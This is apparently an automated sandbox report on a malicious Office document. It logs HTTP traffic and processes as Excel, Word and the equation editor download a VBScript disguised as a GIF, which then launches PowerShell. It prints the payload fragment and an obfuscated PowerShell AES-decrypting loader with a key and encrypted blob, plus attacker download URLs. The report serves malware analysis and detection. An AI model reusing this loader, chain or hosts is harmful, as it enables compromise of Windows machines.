      Jul 30, 2024 18:27:56.328676939 CEST224INData Raw: 31 3e 32 25 5b 33 3d 3b 33 3f b0 34 29 60 5b 25 2b 2c 34 3f 23 38 5b 3f 24 2f 7c 27 2f 28 a7 b0 30 30 25 37 a7 2d 37 2a 37 5e 2f 3b 28 a7 25 2b 35 29 5e 3e 27 2f 26 7c 3f 2a 3f 2e 27 38 29 b0 5b 5f 2a 5f 36 7e 32 29 27 3f 38 2b 3f 3e 30 5f 23 27
      Data Ascii: 1>2%[3=;3?4)`[%+,4?#8[?$/|'/(00%7-7*7^/;(%+5)^>'/&|?*?.'8)[_*_6~2)'?8+?>0_#'6!+/?%(&:,4]4,512?#?#`??(7?%8:?9.?[,,#@42-4-~?<.)0#'30`_>9)`|!=@?(*_(%_(([@[2-'[/@1_?$:*3>99/[*)%,$1?[#?@>+:~~#:?|_'<[0071_??;<1<
      Jul 30, 2024 18:27:56.328690052 CEST1236INData Raw: 3f 3f 5f 5d 31 39 7c 23 28 2d 28 7e 2f 3c 3f 2a 28 3e 5d b0 26 25 39 25 2a 5f 3e 28 33 27 26 29 5f 25 3e 5b 3e 3f 35 3f 35 3f 5b 29 3d 30 3f 30 36 3c 3f 60 27 3f 2b 36 21 26 38 2e 31 2d 3f 2d 25 40 25 3d 3f 37 a7 3f 5b 38 25 2b 5d 3e 3f 26 32 3d
      Data Ascii: ??_]19|#(-(~/<?*(>]&%9%*_>(3'&)_%>[>?5?5?[)=0?06<?`'?+6!&8.1-?-%@%=?7?[8%+]>?&2=/,;3(%5#,962?>)=[%/'@268:$3!5&?$(%8?2???+76=?__??4?.?@$5+5*?8?!1]??|-_.?-!+?+?>5#,`?%?%?;/%*!=(?.41?9|(5#:>50(`*>$#''?/3$6.!~.9?:6<]=*4-+4^-2.02:>6^[5'=
      Jul 30, 2024 18:27:56.328702927 CEST1236INData Raw: 2c 39 35 29 21 2f 40 21 25 31 60 3f 3f 28 21 35 25 3f 2e 25 3a 25 28 b0 3b 3a 3f 40 7c 3c 2b 31 40 33 23 25 33 2f 3d 3f 21 b5 40 3f b0 b5 36 3a 2f 37 21 2e 2c 5f 2d 25 39 38 37 35 2a 36 5e 34 21 21 31 7c a7 34 3f 3d 7e 40 5e 23 5d 35 21 27 23 2c
      Data Ascii: ,95)!/@!%1`??(!5%?.%:%(;:?@|<+1@3#%3/=?!@?6:/7!.,_-%9875*6^4!!1|4?=~@^#]5!'#,9&)96&*<`8=622~2]*&=.(?=#?)%<0-?:,#]?,8#_5^?:3,/?+:>^0?3[53;?4?|7.&^%+%)+0.@3/?_>?5<',1:,'?52(`(/-3?,<??@-_|`77]5192!]_<)35%/(47)9>6~;43`::_#9|*?)!2~?1/%]
      Jul 30, 2024 18:27:56.328716040 CEST1236INData Raw: 5b 31 33 3d 2a 25 29 23 a7 31 3f 34 21 21 39 7c 25 28 30 5f 36 3c 21 3f 34 38 3f 3f 26 2b 25 b5 38 3d 38 b5 3e 7c 34 34 3f 40 31 32 40 2f 25 31 25 23 2b 60 35 7c 7c 2f 37 32 23 31 34 38 3f 34 3b 60 3b 5f 26 3f 3f 3a 5b 3f 26 7e 3c 37 5d 27 b0 3b
      Data Ascii: [13=*%)#1?4!!9|%(0_6<!?48??&+%8=8>|44?@12@/%1%#+`5||/72#148?4;`;_&??:[?&~<7]';;4++'?=1+>17?%(8-:[>#?$3'<75?/&$>:|/;~*:'5,`..|?@%'4@!<8?%?^$'[?+41?751?1>?)/^@?3?5~#*[1#$8`2??+|?|9;(?'~8?9|2:?'-00+74_3?)=[$'839+?[64%@`^#?7|?_@?%?
      Jul 30, 2024 18:27:56.328775883 CEST1236INData Raw: 3f 30 24 a7 32 3d 3f 3c 3b 3f 29 a7 29 2b 40 3f 3e 39 21 2c 26 b0 2f 35 2c 2b 35 34 3f 33 3f a7 36 a7 3b 25 23 3f 35 21 27 3a 37 26 38 b5 3f 5d 30 3f 3f 5b 5e 2a 7c 7e 2f 23 2e 3e 25 32 3f 2b 28 5b 3f 24 28 35 7c 24 7c 26 a7 35 2a 3f 40 21 3f 5f
      Data Ascii: ?0$2=?<;?))+@?>9!,&/5,+54?3?6;%#?5!':7&8?]0??[^*|~/#.>%2?+([?$(5|$|&5*?@!?_&%%8^%(??/:?!23/1[?-]5:|!%?'(%5%~'>(4$9_:@*//<%</;99!?(-6<?^#%#,>[>@'&~:8>+,;!?:2>$~!4$&)^/%:8?)?<,?/?4_`@'-,#+85<~?3/9)|~-28;!?^!>,&!%4|.@2!`3);`7-'?
      Jul 30, 2024 18:27:56.328789949 CEST1236INData Raw: a7 2f a7 7c 34 3f 2b 3c 3c 5b 3c 34 38 29 38 b5 b5 3a 26 21 60 37 29 3f 27 5b 2d 3b 26 2a 7e b0 25 28 2f 5b 36 25 3f 25 40 7e 5b b5 38 5d 36 35 29 2a 23 35 60 35 a7 32 31 3d 23 b0 37 3f 7c 7e 5f 3a 3a b5 3f 34 28 5e b0 40 27 33 60 21 29 2b 33 34
      Data Ascii: /|4?+<<[<48)8:&!`7)?'[-;&*~%(/[6%?%@~[8]65)*#5`521=#7?|~_::?4(^@'3`!)+3486,<_?+22=!5%7~0=&87!?3!/~;<=4*-$#)@!56&[7??2%=(?42%]44%%%$%??:3.!1#)?3&?.6+-|8+.6:,5*]~&/@`???&^`^8%|;3^?`^-$-/>*]2+)>`$%[@=2/)-.1/%^(6~@(23!2%+&.9%8?($8;&
      Jul 30, 2024 18:27:56.328800917 CEST1236INData Raw: 7c b0 3c 38 2e 32 2c 37 37 38 27 5f 35 2d 26 3a 21 33 3c 26 21 36 5e 3f 3f 39 26 25 39 3b 2a 5e 2f 38 29 2c 7c 7c 2a 3f 5e 35 5d 2a 23 32 3b 2a b0 38 b5 b0 3c 38 5e 35 3f 7c 3f 7e 2c 26 2e 3f 3c b5 35 3e 37 2e 2a 5d 26 39 21 3a 2c 3f 25 37 26 3c
      Data Ascii: |<8.2,778'_5-&:!3<&!6^??9&%9;*^/8),||*?^5]*#2;*8<8^5?|?~,&.?<5>7.*]&9!:,?%7&<$&?%?4?7?`_5#-!%*9:<0-3$6'50'?3?844%=*[38?)5#?06`-'+4]@@99?3(?=14<|<3879@/!15!|??89<')@>[+-.&8_0`?7?=4-8~~>?%25-%?*8#3.<;%*'?%.)~?3;~`,?)5=%&&,|;]]7?6+
      Jul 30, 2024 18:27:56.328813076 CEST1236INData Raw: 0a 0d 0d 0d 0a 0a 0d 0d 0a 0a 0a 0d 0a 0a 30 32 30 30 0a 0a 0d 0a 0d 0d 0d 0a 0a 0a 0a 0d 0d 0a 0a 0d 0a 0d 0a 0a 0a 30 0d 0a 0a 0d 0d 0d 0d 0a 0a 0a 0a 0d 0d 0a 0a 0d 0a 0d 0a 0a 0a 30 30 0d 0d 0a 0d 0d 0d 0d 0a 0a 0a 0a 0d 0d 0a 0a 0d 0a 0d 0a
      Data Ascii: 020000000b000000 65715
      Jul 30, 2024 18:27:56.328824997 CEST108INData Raw: 20 20 20 20 09 20 20 20 09 20 09 20 20 30 30 0a 0a 0d 0a 0a 0a 0a 0a 0d 0a 0d 0a 0d 0a 0a 0d 0a 0d 0a 0a 0a 30 0d 0a 0d 0a 0d 0d 0d 0d 0d 0a 0d 0a 0d 0a 0a 0d 0a 0d 0a 0a 0a 30 30 09 20 09 09 09 20 20 20 09 09 09 09 09 09 09 20 09 20 20 20 09 20
      Data Ascii: 00000
      Jul 30, 2024 18:27:56.333729029 CEST1236INData Raw: 20 20 20 20 20 09 09 20 20 20 20 09 20 20 20 09 20 09 20 20 30 30 34 09 20 20 20 09 09 20 20 20 09 20 20 20 09 09 09 09 09 09 20 20 09 09 20 20 20 20 09 20 20 20 09 20 09 09 09 09 09 09 20 09 20 09 20 09 09 20 20 09 20 09 20 09 20 20 09 09 09 20
      Data Ascii: 004 b07 00000


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.2249163188.114.97.3802304C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampBytes transferredDirectionData
      Jul 30, 2024 18:27:57.087600946 CEST129OUTOPTIONS / HTTP/1.1
      User-Agent: Microsoft Office Protocol Discovery
      Host: tny.wtf
      Content-Length: 0
      Connection: Keep-Alive
      Jul 30, 2024 18:27:57.675390005 CEST566INHTTP/1.1 404 Not Found
      Date: Tue, 30 Jul 2024 16:27:57 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: ASP.NET
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6H%2FP2NlJPhXa%2FTfkSn%2Fda9seyrk0LmCKJOczhDBcX8CQrET%2Bkh3c5UczxPchQ24HvmGVJ%2FLfz%2Bt2IwQ1qihCZVff2EtryHkmxwV6auXfZaWSRvoRNRsjfhzi"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ab6b814699f4251-EWR
      alt-svc: h3=":443"; ma=86400
      Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0
      Jul 30, 2024 18:27:58.108501911 CEST129OUTOPTIONS / HTTP/1.1
      User-Agent: Microsoft Office Protocol Discovery
      Host: tny.wtf
      Content-Length: 0
      Connection: Keep-Alive
      Jul 30, 2024 18:27:58.260808945 CEST558INHTTP/1.1 404 Not Found
      Date: Tue, 30 Jul 2024 16:27:58 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: ASP.NET
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tehz8SfY8mylTRAjp56R8TwlRJImz4cHY5TZyh%2FnQKkWbDCyMvDdMvY%2FhhlBdgC6idCcValRmERt46OlcKJQSoSOTCiFcQF6KEAHMmaHzNsVfbo6UO9runoY"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ab6b8187f884251-EWR
      alt-svc: h3=":443"; ma=86400
      Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0
      Jul 30, 2024 18:27:58.296030045 CEST129OUTOPTIONS / HTTP/1.1
      User-Agent: Microsoft Office Protocol Discovery
      Host: tny.wtf
      Content-Length: 0
      Connection: Keep-Alive
      Jul 30, 2024 18:27:58.452951908 CEST560INHTTP/1.1 404 Not Found
      Date: Tue, 30 Jul 2024 16:27:58 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: ASP.NET
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0oazHEPaOKH3HpKMAmJKZpOMW%2FpTzxJZR1Ep76vqFfJitfHjfS8%2FQxN8M9kPa1PokD9L4uqIGCMB3SMr4t9BnzNlr8QnnYtGaD8hyieRHiWL4Zf2%2FGyvTYGp"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ab6b819a8d24251-EWR
      alt-svc: h3=":443"; ma=86400
      Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0
      Jul 30, 2024 18:28:03.278104067 CEST131OUTHEAD /EvwK HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: tny.wtf
      Content-Length: 0
      Connection: Keep-Alive
      Jul 30, 2024 18:28:03.438698053 CEST548INHTTP/1.1 405 Method Not Allowed
      Date: Tue, 30 Jul 2024 16:28:03 GMT
      Connection: keep-alive
      Allow: GET
      X-Powered-By: ASP.NET
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ez8TyaikE3ym5KlkPQgf5rljcTuoPIRwYNHPa6qpgXyAphsIexwEn2INM%2Fk2tAfrYpCfHDxzij0dmUr%2FnqlTJpquiUehlkmeuLqDvSpyAHkXHoTMez%2FTVF9Q"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ab6b838d9194251-EWR
      alt-svc: h3=":443"; ma=86400


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.2249164188.114.97.3802304C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampBytes transferredDirectionData
      Jul 30, 2024 18:27:58.752856970 CEST112OUTHEAD /EvwK HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft Office Existence Discovery
      Host: tny.wtf
      Jul 30, 2024 18:27:59.342654943 CEST552INHTTP/1.1 405 Method Not Allowed
      Date: Tue, 30 Jul 2024 16:27:59 GMT
      Connection: keep-alive
      Allow: GET
      X-Powered-By: ASP.NET
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2FbaxaYBhFEPN9jku8o8WW1upiHRtObGtTHaNWhmZ8ZBMdCTz%2BG5fCl9I7RPaQzDvk5WBSTP%2B%2B%2BHYFEaD8qH81bQPwjNBwr6wJpjDbCUh4AzcffB3lj7GChL"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ab6b81eebc742cf-EWR
      alt-svc: h3=":443"; ma=86400
      Jul 30, 2024 18:27:59.553334951 CEST552INHTTP/1.1 405 Method Not Allowed
      Date: Tue, 30 Jul 2024 16:27:59 GMT
      Connection: keep-alive
      Allow: GET
      X-Powered-By: ASP.NET
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2FbaxaYBhFEPN9jku8o8WW1upiHRtObGtTHaNWhmZ8ZBMdCTz%2BG5fCl9I7RPaQzDvk5WBSTP%2B%2B%2BHYFEaD8qH81bQPwjNBwr6wJpjDbCUh4AzcffB3lj7GChL"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ab6b81eebc742cf-EWR
      alt-svc: h3=":443"; ma=86400


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.2249166172.245.123.11803216C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      TimestampBytes transferredDirectionData
      Jul 30, 2024 18:28:04.009824991 CEST339OUTGET /46/seethemoononlinetoseebeautygirl.gIF HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 172.245.123.11
      Connection: Keep-Alive
      Jul 30, 2024 18:28:04.487124920 CEST1236INHTTP/1.1 200 OK
      Date: Tue, 30 Jul 2024 16:28:04 GMT
      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
      Last-Modified: Mon, 29 Jul 2024 05:46:01 GMT
      ETag: "66e5c-61e5c6047dcf6"
      Accept-Ranges: bytes
      Content-Length: 421468
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: image/gif
      Data Raw: ff fe 64 00 69 00 6d 00 20 00 74 00 68 00 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 45 00 20 00 0d 00 0a 00 74 00 68 00 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 20 00 3d 00 20 00 70 00 61 00 67 00 6f 00 64 00 65 00 69 00 72 00 6f 00 0d 00 0a 00 0d 00 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 31 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 74 00 68 00 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 32 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 74 00 68 00 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 74 00 72 00 [TRUNCATED]
      Data Ascii: dim thermiatriaEE thermiatriaE = pagodeirotriennado("L_HelpAlias_001_0_Message") & thermiatriaE & _triennado("L_HelpAlias_002_0_Message") & thermiatriaE & _triennado("L_HelpAlias_003_0_Message") & thermiatriaE & _triennado("X_HelpAlias_004_0_Message") & thermiatriaE & _triennado("X_HelpAlias_005_0_Message") & thermiatriaE & _triennado("X_HelpAlias_006_0_Message") & thermiatriaE & _triennado("X_HelpAlias_007_0_Message") & thermiatriaE & _
      Jul 30, 2024 18:28:04.487181902 CEST1236INData Raw: 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 58 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 38 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00
      Data Ascii: triennado("X_HelpAlias_008_0_Message") & thermiatriaE & _triennado("X_HelpAlias_009_0_Message") & thermiatriaE & _tri
      Jul 30, 2024 18:28:04.487194061 CEST1236INData Raw: 20 00 70 00 61 00 67 00 6f 00 64 00 65 00 69 00 72 00 6f 00 0d 00 0a 00 0d 00 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 31 00 5f 00
      Data Ascii: pagodeirotriennado("L_HelpAlias_001_0_Message") & ethermiatriaE & _triennado("L_HelpAlias_002_0_Message") & ethermi
      Jul 30, 2024 18:28:04.487432957 CEST1236INData Raw: 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 31 00 31 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 65 00 74 00 68 00 65 00
      Data Ascii: nnado("L_HelpAlias_011_0_Message") & ethermiatriaE & _triennado("x_HelpAlias_012_0_Message") & ethermiatriaE & _trienn
      Jul 30, 2024 18:28:04.487443924 CEST1236INData Raw: 29 00 20 00 26 00 20 00 6f 00 65 00 74 00 68 00 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 58 00 5f 00 48 00 65 00 6c 00 70 00
      Data Ascii: ) & oethermiatriaE & _triennado("X_HelpAlias_004_0_Message") & oethermiatriaE & _triennado("X_HelpAlias_005_0_Message"
      Jul 30, 2024 18:28:04.487453938 CEST1236INData Raw: 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 31 00
      Data Ascii: ermiatriaE & _triennado("L_HelpAlias_014_0_Message") & oethermiatriaE & _triennado("X_HelpAlias_015_0_Message") & oeth
      Jul 30, 2024 18:28:04.487463951 CEST776INData Raw: 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 49 00 4e 00 56 00 4f 00 50 00 54 00 5f 00 45 00 72 00 72 00 6f 00 72 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 53 00 77 00 69 00 74 00 63 00 68 00
      Data Ascii: const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "private const L_UNKOPT_ErrorMessage
      Jul 30, 2024 18:28:04.487476110 CEST1236INData Raw: 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 53 00 63 00 72 00 69 00 70 00 74 00 4e 00 61 00 6d 00 65 00 4e 00 6f 00 74 00 46 00 6f 00 75 00 6e 00 64 00 5f 00 45 00 72 00 72 00 6f 00 72 00 4d 00 65 00 73 00 73 00
      Data Ascii: vate const L_ScriptNameNotFound_ErrorMessage = "Invalid usage of command line; winrm.vbs not found in command string."pr
      Jul 30, 2024 18:28:04.487823963 CEST1236INData Raw: 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 55 00 52 00 49 00 2c 00 20 00 74 00 6f 00 6b 00 65 00 6e 00 20 00 69 00 73 00 20 00 30 00 20 00 6c 00 65 00 6e 00 67 00 74 00 68 00 22 00 20 00 20 00 20 00
      Data Ascii: = "Invalid URI, token is 0 length" private const L_INVWMIURI1_Message = "Invalid WMI resource URI - no '/' f
      Jul 30, 2024 18:28:04.487835884 CEST1236INData Raw: 70 00 61 00 72 00 73 00 65 00 20 00 58 00 4d 00 4c 00 3a 00 20 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 58 00 53 00 4c 00 45 00 52 00 52 00 4f 00 52 00 5f 00 4d 00 65 00
      Data Ascii: parse XML: "private const L_XSLERROR_Message = "Unable to parse XSL file. Either it is inaccessible or invalid: "
      Jul 30, 2024 18:28:04.492127895 CEST1236INData Raw: 6f 00 6e 00 20 00 72 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 3a 00 20 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 50 00 55 00 54 00 5f 00 50 00 41 00 52 00 41 00 4d 00
      Data Ascii: on resource: "private const L_PUT_PARAM_NOARRAY_Message = "Multiple matching parameter names not allowedin @{...}: "pr


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      5192.168.2.2249167198.46.176.133803332C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Jul 30, 2024 18:28:08.083062887 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
      Host: 198.46.176.133
      Connection: Keep-Alive


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      6192.168.2.2249168198.46.176.133803332C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Jul 30, 2024 18:28:29.479597092 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
      Host: 198.46.176.133
      Connection: Keep-Alive


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:12:27:32
      Start date:30/07/2024
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Imagebase:0x13fcf0000
      File size:28'253'536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Target ID:4
      Start time:12:27:55
      Start date:30/07/2024
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
      Imagebase:0x13feb0000
      File size:1'423'704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:8
      Start time:12:28:02
      Start date:30/07/2024
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Imagebase:0x400000
      File size:543'304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:9
      Start time:12:28:04
      Start date:30/07/2024
      Path:C:\Windows\SysWOW64\wscript.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS"
      Imagebase:0x240000
      File size:141'824 bytes
      MD5 hash:979D74799EA6C8B8167869A68DF5204A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:10
      Start time:12:28:05
      Start date:30/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWD